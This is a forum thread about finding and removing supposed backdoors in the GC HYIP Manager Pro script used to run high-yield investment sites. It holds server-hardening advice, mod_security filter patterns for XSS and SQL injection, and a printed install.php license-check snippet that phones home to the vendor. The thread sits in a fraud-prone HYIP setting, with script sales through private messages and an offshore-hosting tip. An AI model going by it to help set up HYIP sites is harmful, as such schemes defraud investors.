GC HYIP manager script fixes

[admin]

There are some HYIP manager Pro script fixes. Check your script if there is no threat in it. 
There is very high risk that there is a backdoor in your script = threat that allows hacker to abuse your program and even to get your E-gold account password!

How to remove backdoors from HYIP manager script tutorials:
http://zydusnet.com/forum/viewtopic.php?t=340 - complete, many fixes
http://www.zydusnet.com/forum/viewforum.php?f=6 - Zydusnet forum about HYIP hosting
http://www.etalkmoney.com/moneygeneral/goldcoders-backdoors/ - usefull guide
http://www.etalkmoney.com/moneygeneral/goldcoders-hyip-script-more-tips-to-secure-your-hyip/
http://cashmonster.co.uk/forum/index.php?topic=241.0

Local tutorials:
ddd backdoor security.inc - http://www.hyipmonitorfree.com/forum/index.php/topic,64.0.html (remote)

Security rules & recommendations!!!:
- create a ".htaccess" file with a content "deny from all".
Add this file into inc, tmpl and tmpl_c directories. This will prevent anyone to access these folders.
- change file permissions for settings.php to 644 (rw-,r--,r--), if you will need to change your program settings from admin area, just change back to 666.
- search your script for the "@" because there can be some email address on which is sented your e-gold account passphrasse or admin login details while making the mass payment or loging in. It is usually in index.php or /inc/config.inc.php file.
- If you are paying out using HYIP manager's mass payment tool, allow E-gold.com automation only from your servers IP (not from all IPs!).
At first I have added my IP into E-gold.com account sentinel / automation settings and then made a mass payment from my HYIP manager admin area - It did not worked and the e-gold sent me an automatic message that the automation failed from certain IP address xxx.xxx.... This IP address is your servers IP address! Just place this IP into your E-gold Account sentinel / Automation access / settings. Allow automation (payments) only from this IP.
- NEVER activate auto-withdrawl even if you host your site on a dedicated server, with no other site located on that server. No server in the world is 100% hacker proof. So, if a hacker finds a work-around to hack the auto-withdrawl, then you will lose money from your egold.
- Do not allow Wap access. Delete wap.php and goldmoney_processing.php files you do not use.

Add following code into ".htaccess" file located in the root directory to prevent sql injections and such attack:

# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"

#Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

Have you a dispute or any other security improvements. Please post it!!
If you want a fixed version of HYIP manager script, PM me.

[mondros]

That very good idea, thank you !

[admin]

Yes, i did not found yet any source regarding HYIP script security on the internet, thats why i have decided to create this topic. I will update it time to time.
If anyone know any other possible backdoors or vulnerabilities in HYIP manager Pro script, please post there and help others!
thanks

[digigoods]

has anyone noticed this string in the Install.php of GC HMPro

Code: [Select]

if (((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((($frm_env[HTTP_HOST] == 'goldmillions.com' OR $frm_env[HTTP_HOST] == 'www.goldmillions.com') OR $frm_env[HTTP_HOST] == 'fullhyip.com') OR $frm_env[HTTP_HOST] == 'www.fullhyip.com') OR $frm_env[HTTP_HOST] == 'gopaying.com') OR $frm_env[HTTP_HOST] == 'www.gopaying.com') OR $frm_env[HTTP_HOST] == 'jss-capitalinvest.com') OR $frm_env[HTTP_HOST] == 'www.jss-capitalinvest.com') OR $frm_env[HTTP_HOST] == 'euroyenhyip.com') OR $frm_env[HTTP_HOST] == 'akimirka.net/xxx') OR $frm_env[HTTP_HOST] == 'akimirka.net/xxx') OR $frm_env[HTTP_HOST] == 'www.akimirka.net') OR $frm_env[HTTP_HOST] == 'akimirka.net') OR $frm_env[HTTP_HOST] == 'www.ecurrencyreserve.com') OR $frm_env[HTTP_HOST] == 'beetleinvest.com') OR $frm_env[HTTP_HOST] == 'www.beetleinvest.com') OR $frm_env[HTTP_HOST] == 'carnaby-group.com') OR $frm_env[HTTP_HOST] == 'www.carnaby-group.com') OR $frm_env[HTTP_HOST] == '4wrxinvest.com') OR $frm_env[HTTP_HOST] == 'www.4wrxinvest.com') OR $frm_env[HTTP_HOST] == 'capitalhyip.com') OR $frm_env[HTTP_HOST] == 'www.capitalhyip.com') OR $frm_env[HTTP_HOST] == 'lexus-hyip.com') OR $frm_env[HTTP_HOST] == 'www.lexus-hyip.com') OR $frm_env[HTTP_HOST] == 'gold-private.com') OR $frm_env[HTTP_HOST] == 'www.gold-private.com') OR $frm_env[HTTP_HOST] == 'johnhopperinvestments.com') OR $frm_env[HTTP_HOST] == 'www.johnhopperinvestments.com') OR $frm_env[HTTP_HOST] == 'stable-investment.biz') OR $frm_env[HTTP_HOST] == 'www.stable-investment.biz') OR $frm_env[HTTP_HOST] == 'real-funds.com') OR $frm_env[HTTP_HOST] == 'www.real-funds.com') OR $frm_env[HTTP_HOST] == 'earningmaker.com') OR $frm_env[HTTP_HOST] == 'www.earningmaker.com') OR $frm_env[HTTP_HOST] == 'smarthyip.us') OR $frm_env[HTTP_HOST] == 'www.smarthyip.us') OR $frm_env[HTTP_HOST] == 'ghyip.com') OR $frm_env[HTTP_HOST] == 'www.ghyip.com') OR $frm_env[HTTP_HOST] == 'instabank.net') OR $frm_env[HTTP_HOST] == 'www.instabank.net') OR $frm_env[HTTP_HOST] == 'digiwex.com') OR $frm_env[HTTP_HOST] == 'www.digiwex.com') OR $frm_env[HTTP_HOST] == 'e-impek.com') OR $frm_env[HTTP_HOST] == 'www.e-impek.com') OR $frm_env[HTTP_HOST] == 'euro-invest.org') OR $frm_env[HTTP_HOST] == 'www.euro-invest.org') OR $frm_env[HTTP_HOST] == 'bigtradecenter.com') OR $frm_env[HTTP_HOST] == 'www.bigtradecenter.com') OR $frm_env[HTTP_HOST] == 'sierrainvestmentclub.com') OR $frm_env[HTTP_HOST] == 'www.sierrainvestmentclub.com') OR $frm_env[HTTP_HOST] == 'thelasthyip.com') OR $frm_env[HTTP_HOST] == 'www.thelasthyip.com') OR $frm_env[HTTP_HOST] == 'goldenmonth.com') OR $frm_env[HTTP_HOST] == 'www.goldenmonth.com') OR $frm_env[HTTP_HOST] == 'bluestock.biz') OR $frm_env[HTTP_HOST] == 'www.bluestock.biz') OR $frm_env[HTTP_HOST] == 'hyipspark.com') OR $frm_env[HTTP_HOST] == 'www.hyipspark.com') OR $frm_env[HTTP_HOST] == 'rockcohyip.com') OR $frm_env[HTTP_HOST] == 'www.rockcohyip.com') OR $frm_env[HTTP_HOST] == 'themegadeal.com') OR $frm_env[HTTP_HOST] == 'www.themegadeal.com') OR $frm_env[HTTP_HOST] == 'dx-invest.biz') OR $frm_env[HTTP_HOST] == 'www.dx-invest.biz') OR $frm_env[HTTP_HOST] == 'pyramidhyip.com') OR $frm_env[HTTP_HOST] == 'www.pyramidhyip.com') OR $frm_env[HTTP_HOST] == 'hyip-experience.com') OR $frm_env[HTTP_HOST] == 'www.hyip-experience.com') OR $frm_env[HTTP_HOST] == 'globalforexinvest.com') OR $frm_env[HTTP_HOST] == 'www.globalforexinvest.com') OR $frm_env[HTTP_HOST] == 'hyipforever.biz') OR $frm_env[HTTP_HOST] == 'www.hyipforever.biz') OR $frm_env[HTTP_HOST] == 'max-hyip.com') OR $frm_env[HTTP_HOST] == 'www.max-hyip.com') OR $frm_env[HTTP_HOST] == 'investdream.com') OR $frm_env[HTTP_HOST] == 'www.investdream.com') OR $frm_env[HTTP_HOST] == 'invest-network.net') OR $frm_env[HTTP_HOST] == 'www.invest-network.net') OR $frm_env[HTTP_HOST] == 'easywayhyip.com') OR $frm_env[HTTP_HOST] == 'www.easywayhyip.com') OR $frm_env[HTTP_HOST] == 'sime-groups.net') OR $frm_env[HTTP_HOST] == 'www.sime-groups.net') OR $frm_env[HTTP_HOST] == 'privateforex.com') OR $frm_env[HTTP_HOST] == 'www.privateforex.com') OR $frm_env[HTTP_HOST] == 'easilyinvest.com') OR $frm_env[HTTP_HOST] == 'www.easilyinvest.com') OR $frm_env[HTTP_HOST] == 'hyipforever.biz') OR $frm_env[HTTP_HOST] == 'www.hyipforever.biz') OR $frm_env[HTTP_HOST] == 'www.andyegold.com') OR $frm_env[HTTP_HOST] == 'andyegold.com') OR $frm_env[HTTP_HOST] == 'worldtrustinv.com') OR $frm_env[HTTP_HOST] == 'www.worldtrustinv.com') OR $frm_env[HTTP_HOST] == 'www.hyipfunds.com') OR $frm_env[HTTP_HOST] == 'hyipfunds.com') OR $frm_env[HTTP_HOST] == 'victoryhyip.com') OR $frm_env[HTTP_HOST] == 'www.victoryhyip.com') OR $frm_env[HTTP_HOST] == 'fx-wizards.com') OR $frm_env[HTTP_HOST] == 'www.fx-wizards.com') OR $frm_env[HTTP_HOST] == 'hyi-p.com') OR $frm_env[HTTP_HOST] == 'www.hyi-p.com') OR $frm_env[HTTP_HOST] == 'hyiptreasures.com') OR $frm_env[HTTP_HOST] == 'www.hyiptreasures.com') OR $frm_env[HTTP_HOST] == 'honesthyip.com') OR $frm_env[HTTP_HOST] == 'www.honesthyip.com') OR $frm_env[HTTP_HOST] == 'sapphirehyip.com') OR $frm_env[HTTP_HOST] == 'www.sapphirehyip.com') OR $frm_env[HTTP_HOST] == 'quallityhyip.com') OR $frm_env[HTTP_HOST] == 'www.quallityhyip.com') OR $frm_env[HTTP_HOST] == 'www.goldcoders.com') OR $frm_env[HTTP_HOST] == 'moviemakersfinance.com') OR $frm_env[HTTP_HOST] == 'www.moviemakersfinance.com') OR $frm_env[HTTP_HOST] == 'automatic-hyip.com') OR $frm_env[HTTP_HOST] == 'www.automatic-hyip.com') OR $frm_env[HTTP_HOST] == 'chiligold.com') OR $frm_env[HTTP_HOST] == 'www.chiligold.com') OR $frm_env[HTTP_HOST] == 'ezoneinvest.com') OR $frm_env[HTTP_HOST] == 'www.ezoneinvest.com') OR $frm_env[HTTP_HOST] == 'hyipfunds.com') OR $frm_env[HTTP_HOST] == 'www.hyipfunds.com') OR $frm_env[HTTP_HOST] == 'profitbygold.com') OR $frm_env[HTTP_HOST] == 'www.profitbygold.com') OR $frm_env[HTTP_HOST] == 'quick-income.com') OR $frm_env[HTTP_HOST] == 'www.quick-income.com') OR $frm_env[HTTP_HOST] == 'dutchservice.com') OR $frm_env[HTTP_HOST] == 'www.dutchservice.com') OR $frm_env[HTTP_HOST] == 'shortinvest.com') OR $frm_env[HTTP_HOST] == 'www.shortinvest.com') OR $frm_env[HTTP_HOST] == 'mind-hyip.com') OR $frm_env[HTTP_HOST] == 'www.mind-hyip.com') OR ($frm_env[HTTP_HOST] == 'www.ltinvest.com' OR $frm_env[HTTP_HOST] == 'ltinvest.com')))
    {
    }
    else
    {
      $str = send_string_to_gold_coders_install ();
      if ($str != md5 ('ok' . $frm_env['HTTP_HOST'] . 'zzzifdsljfdkljfs'))
      {
        $smarty->assign ('wrong_license', 0);
        $ok = 1;
      }
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net/xxx' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net/xxx' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net/xxx/' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'akimirka.net' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'ezoneinvest.com' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'www.ezoneinvest.com' AND $ok == 0))
    {
      $ok = 1;
      $smarty->assign ('wrong_license', 0);
    }

    if (($frm_env['HTTP_HOST'] == 'hyipfunds.com' AND $ok == 0))

Im working on cleaning and addons please add me to msn messenger digigoods@hotmail.com

[admin]

This string should be removed. I think that you cant install your script without having your domain name typed in this file or registered at Goldcoders. If you want to have the fixed install.php file, pm me.

[carlangas2000]

Hello admin. You can send me a install.php file clean?, thanks for your work

[admin]

Hello admin. You can send me a install.php file clean?, thanks for your work
Email sent.

[carlangas2000]

thank you admin!!! Only one question, when i try install, i write install.php, but don´t appear anything. I made a clean of backdoors, and now don´t appear nothing when a try install. Plaease, If some one have a script of GC or other hyip/autosurf (I prefer autosuf), please send me a PM o send it direcly to nowgold2@hotmail.com. Thanks

[carlangas2000]

Hello admin:

I rode your message where that you send me yesterday. My question is if you have a script of rollersoft clean (autosurf) or other autosurf, because i prefer a autosurf before than a hyip.

Is really clean and operative the script that you offer me? I am scared of that the script does not work to me and to lose the money.

Thanks for your time.

The PM that i send you arrived you fine? I think that my the PM that i send you don´t arrive you

[admin]

I have PMed you. im sorry for delay

[Alex]

Hello admin ,
Thank you for very usefull information .Nobody in internet doen't wrote abote it..
Could you please suggest what script should i use for create own hyip.. i don't know programming at all.. i need just script without trojans , backdoors and etc..please suggest free or paid version of this scripts..

Thank you
alex

[admin]

I can sell you the script i have fixed. pmed you

[confused]

Hello admin do you have a secure latest copy of GC HYIP Manager Pro with all trojans,backdoors,SLQ injection etc closed.

I checked everywhere and most of them are bugged . Please help if possible.

[Peter]

Hello Admin,

really a good Topic. thanks for all. Please check your pm.

regards
peter

[admin]

Hello Admin,

really a good Topic. thanks for all. Please check your pm.

regards
peter

Thank you. If you or anyone else found any other important fixes or have a security recommendation, please post it.

[prodix]

i have bought a GC hyip script pro... but i found that a lot of problems.. like security setting... e-gold alternate passphrase and others.. sometimes it's hard to login to admin area and auto notification e-mail does not work... hm.. admin, can i buy a very clean and 100% hackproof with you?? Thanks...

[gloria]

Thank you. If you or anyone else found any other important fixes or have a security recommendation, please post it.

Hi admin - Great info, thanks! I've managed several HYIPs but most of them was hacked. Just wanted to say that:
- In additional to deleting wap.php and goldmoney_processing.php files, you should delete the e-bullion_processing.php file (If you don't use of it) as it enables a hacker to add the fake bonuses to his account.
- Some of the another *_processing.php files needs to be renamed for security reasons (You can see them on Setting page of the admin area).
- You should always enable altearnate password on admin area.
Now I have a question! Can you let me know a good hosting company that approve a HYIP site to be hosted on it without problem?
Thanks for your time - Gloria

[gloria]

- create a ".htaccess" file with a content "deny from all".

Dear admin, Is your meant to change the permission of the ".htaccess"? Can you explain more?
Thanks for your time - Gloria

[admin]

Thank you for the recommendations Gloria! I agree that enabling alternate passphrasse in admin area is necessary.
Regarding hosting website, try http://offshorehost.biz/
-htaccess file - "deny from all" will ensure that files in certain directory can't be accessed.

[atr7]

Hi, newby here...
I am interested to get a HYIP script at http://www.hyip-script.info/...
The issue that worries me is that the price is so cheap that I don't know if it is true.
Anyone ever purchase their script before?

Thanks.